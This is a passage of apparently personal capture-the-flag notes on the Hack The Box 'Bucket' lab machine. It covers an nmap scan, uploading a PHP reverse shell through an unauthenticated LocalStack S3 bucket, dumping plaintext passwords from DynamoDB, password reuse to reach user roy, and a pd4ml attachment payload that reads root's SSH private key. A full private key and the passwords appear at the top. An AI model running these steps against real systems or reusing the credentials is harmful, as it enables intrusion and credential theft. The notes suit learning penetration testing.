Servie user password

? Mgmt Management@#1#

? Cloudadm Welcome123!

? Sysadm n2vM_K_Q.Aa2

ssh Roy n2vM_K_Q.Aa2

SSH Keys
Root

-----BEGIN OPENSSH PRIVATE KEY-----

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
-----END OPENSSH PRIVATE KEY-----
```# Nmap
*OS: Ubuntu*
*Hostname leak in title*

```bash
# Nmap 7.91 scan initiated Sun Apr 25 13:47:51 2021 as: nmap -sC -sV -oA
bucket 10.10.10.212
Nmap scan report for bucket.htb (10.10.10.212)
Host is up (0.56s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open http Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at

https://nmap.org/submit/ .
# Nmap done at Sun Apr 25 13:48:44 2021 -- 1 IP address (1 host up) scanned
in 53.15 seconds
```** When we visit the page bucket.htb and inspect element and refresh the
page and
go to the network then we find a new site i.e
```bash
s3.bucket.htb
**When we do the curl of the head of s3.bucket.htb we get
This show that this is use the amazon stuff

curl --head s3.bucket.htb

HTTP/1.1 404
Date: Sun, 25 Apr 2021 19:07:58 GMT
Server: hypercorn-h11
content-type: text/html; charset=utf-8
content-length: 21
access-control-allow-origin: *
access-control-allow-methods: HEAD,GET,PUT,POST,DELETE,OPTIONS,PATCH
access-control-allow-headers: authorization,content-type,content-md5,cache-
control,x-amz-content-sha256,x-amz-date,x-amz-security-token,x-amz-user-
agent,x-amz-target,x-amz-acl,x-amz-version-id,x-localstack-target,x-amz-
tagging
access-control-expose-headers: x-amz-version-id

**We have to install awscli using the cmd

apt install awscli

**Using aws

cmd:: aws --endpoint-url http://s3.bucket.htb s3 ls

output:: 2021-04-26 00:42:03 adserver

** We are going to use the php shell i.e

 cp /usr/share/laudanum/php/php-reverse-shell.php rev.php
```### Getting into the machine

### First LS
```bash
aws --endpoint-url http://s3.bucket.htb s3 cp rev.php s3://adserver/

Fake Cred
These creds work because localstacks is being used and doesn't have IAM
configured(?

aws configure
AWS Access Key ID [****************nshi]:
AWS Secret Access Key [****************lol]:
Default region name [us-east-1]:
Default output format [None]:

LS

aws --endpoint-url http://s3.bucket.htb s3 ls adserver

PRE images/
2021-04-26 00:46:02 5344 index.html

cp

aws --endpoint-url http://s3.bucket.htb s3 cp rev.php s3://adserver/

1 ⨯
upload: ./rev.php to s3://adserver/rev.php

Proof

aws --endpoint-url http://s3.bucket.htb s3 ls adserver

PRE images/
2021-04-26 01:04:04 5344 index.html
2021-04-26 01:05:36 5492 rev.php

Then visit the site to gain first LS

 *** s3.bucket.htb
*** bucket.htb/rev.php##Apache virtual Host

Port 8000  Running as Root

www-data@bucket:/etc/apache2/sites-enabled$ cat 000-default.conf | grep -v

'\#' | grep .
<abled$ cat 000-default.conf | grep -v '\#' | grep .
<VirtualHost 127.0.0.1:8000>
<IfModule mpm_itk_module>
AssignUserId root root
</IfModule>
DocumentRoot /var/www/bucket-app
</VirtualHost>
<VirtualHost *:80>
DocumentRoot /var/www/html
RewriteEngine On
RewriteCond %{HTTP_HOST} !^bucket.htb$
RewriteRule /.* http://bucket.htb/ [R]
</VirtualHost>
<VirtualHost *:80>
ProxyPreserveHost on
# 4586 == Docker {Localstack}
ProxyPass / http://localhost:4566/
ProxyPassReverse / http://localhost:4566/
<Proxy *>
Order deny,allow
Allow from all
</Proxy>
ServerAdmin webmaster@localhost
ServerName s3.bucket.htb
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
```## Dumping dynamodb

```bash
aws --endpoint-url http://s3.bucket.htb dynamodb scan --table-name users
{
"Items": [
{
"password": {
"S": "Management@#1@#"
 },
"username": {
"S": "Mgmt"
}
},
{
"password": {
"S": "Welcome123!"
},
"username": {
"S": "Cloudadm"
}
},
{
"password": {
"S": "n2vM-<_K_Q:.Aa2"
},
"username": {
"S": "Sysadm"
}
}
],
"Count": 3,
"ScannedCount": 3,
"ConsumedCapacity": null
}

Making it Pretty

aws --endpoint-url http://s3.bucket.htb dynamodb scan --table-name users |

jq -r '.Items[] | "\(.username[]):\(.password[])"'
Mgmt:Management@#1@#
Cloudadm:Welcome123!
Sysadm:n2vM-<_K_Q:.Aa2
```## Roy users
```bash
www-data@bucket:/var/www$ su - roy
su - roy
Password: n2vM-<_K_Q:.Aa2

roy@bucket:~$ ls
 ls
project user.txt
roy@bucket:~$ cat user.txt
cat user.txt
9ee0f12055e8fed79aeaaf078df09479

*We can do the ssh but sometime it can reject to connect so we do su - roy with pwd
**n2vM_K_Q.Aa2

ssh roy@10.10.10.212
The authenticity of host '10.10.10.212 (10.10.10.212)' can't be established.
ECDSA key fingerprint is SHA256:7+5qUqmyILv7QKrQXPArj5uYqJwwe7mpUbzD/7cl44E.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.212' (ECDSA) to the list of known
hosts.
roy@10.10.10.212's password:
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-48-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Sun 25 Apr 2021 08:53:25 PM UTC

System load: 0.07

Usage of /: 37.4% of 17.59GB
Memory usage: 33%
Swap usage: 0%
Processes: 287
Users logged in: 0
IPv4 address for br-bee97070fb20: 172.18.0.1
IPv4 address for docker0: 172.17.0.1
IPv4 address for ens160: 10.10.10.212
IPv6 address for ens160: dead:beef::250:56ff:feb9:6235

229 updates can be installed immediately.

103 of these updates are security updates.
To see these additional updates run: apt list --upgradable

The list of available updates is more than a week old.

 To check for new updates run: sudo apt update

Last login: Sun Apr 25 16:53:08 2021 from 10.10.14.116

```# Roy
## Gain Access
*Password reuse in dynamodb, the n2vM-<_K_Q:.Aa2*
## Port 8000
![[Pasted image 20210426134449.png]]### Table
*To create the table*
```bash
aws --endpoint-url http://s3.bucket.htb dynamodb create-table \
--table-name alerts \
--attribute-definitions AttributeName=Title,AttributeType=S \
--key-schema AttributeName=Artist,KeyType=HASH \
--provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5

To see the content in the table

aws --endpoint-url http://s3.bucket.htb s3 dynamodb --table-list

Table
To create the table use cmd

aws --endpoint-url http://s3.bucket.htb dynamodb create-table \

--table-name alerts \
--attribute-definitions AttributeName=title,AttributeType=S \
--key-schema AttributeName=title,KeyType=HASH \
--provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5

Ransomware.json
We have to upload it to get something important stuff

{"title":
{"S": "Ransomware"},
"data" :
{"S": "<html><pd4ml:attachment src='file:///root/.ssh/id_rsa'
description='attachment sample' icon='Paperclip'/>"}
}
Uploading ransomware

aws --endpoint-url http://s3.bucket.htb dynamodb put-item --table-name

alerts --item file://ransomeware.json

Check
To check whether our content is upload or not run the cmd:

root💀kali)-[/home/manshi/hackthebox/machine/bucket]
└─# aws --endpoint-url http://s3.bucket.htb dynamodb list-tables
{
"TableNames": [
"alerts",
"users"
]
}

Now use curl

And try to get the main stuff

curl -X POST -d "action=get_alerts" http://127.0.0.1:8000

Getting the important stuff

Visit the site and refresh the url i.e localhost:8000/files
## AWS Creds
Need root

www-data@bucket:/.aws$ ls -la
ls -la
total 16
drwxr-xr-x 2 root root 4096 Sep 23 2020 .
drwxr-xr-x 21 root root 4096 Feb 10 12:49 ..
-rw------- 1 root root 22 Sep 16 2020 config
-rw------- 1 root root 64 Sep 16 2020 credentials

Unknown socket

www-data@bucket:/$ ss -lnpt
ss -lnpt
State Recv-Q Send-Q Local Address:Port Peer Address:Port
Process
[snip]
LISTEN 0 4096 127.0.0.1:39035 0.0.0.0:*
[snip]